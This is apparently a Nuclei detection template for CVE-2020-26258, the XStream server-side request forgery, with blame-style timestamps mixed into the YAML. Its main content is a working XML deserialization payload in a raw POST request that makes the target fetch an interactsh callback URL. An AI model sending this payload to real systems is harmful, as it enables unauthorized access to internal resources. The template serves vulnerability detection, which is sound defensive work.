2023-03-12 03:38:05 +00:00
id : CVE-2020-26258
info :
2023-04-09 03:01:30 +00:00
name : Xstream < 1.4.15 - Server Side Request Forgery
2023-03-12 03:38:05 +00:00
author : pwnhxl
severity : high
2023-03-23 11:21:46 +00:00
description : |
XStream before version 1.4.15, a Server-Side Forgery Request vulnerability can be activated when unmarshalling. The vulnerability may allow a remote attacker to request data from internal resources that are not publicly available only by manipulating the processed input stream.
2023-03-12 03:38:05 +00:00
reference :
- https://x-stream.github.io/CVE-2020-26258.html
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26258
2023-03-29 20:18:04 +00:00
- https://github.com/x-stream/xstream/security/advisories/GHSA-4cch-wxpw-8p28
classification :
cvss-metrics : CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score : 7.7
cve-id : CVE-2020-26258
cwe-id : CWE-918
2023-03-23 11:21:46 +00:00
tags : cve,cve2020,xstream,ssrf,oast
2023-03-12 03:38:05 +00:00
requests :
- raw :
- |
POST / HTTP/1.1
Host : {{Hostname}}
Content-Type : application/xml
<map>
<entry>
<jdk.nashorn.internal.objects.NativeString>
<flags>0</flags>
<value class='com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data'>
<dataHandler>
<dataSource class='javax.activation.URLDataSource'>
<url>http://{{interactsh-url}}/internal/:</url>
</dataSource>
<transferFlavors/>
</dataHandler>
<dataLen>0</dataLen>
</value>
</jdk.nashorn.internal.objects.NativeString>
<string>test</string>
</entry>
</map>
matchers-condition : and
matchers :
- type : word
part : interactsh_protocol
words :
- "http"
2023-03-22 10:06:23 +00:00
- type : word
part : interactsh_request
words :
2023-03-29 18:40:01 +00:00
- "User-Agent: Java"
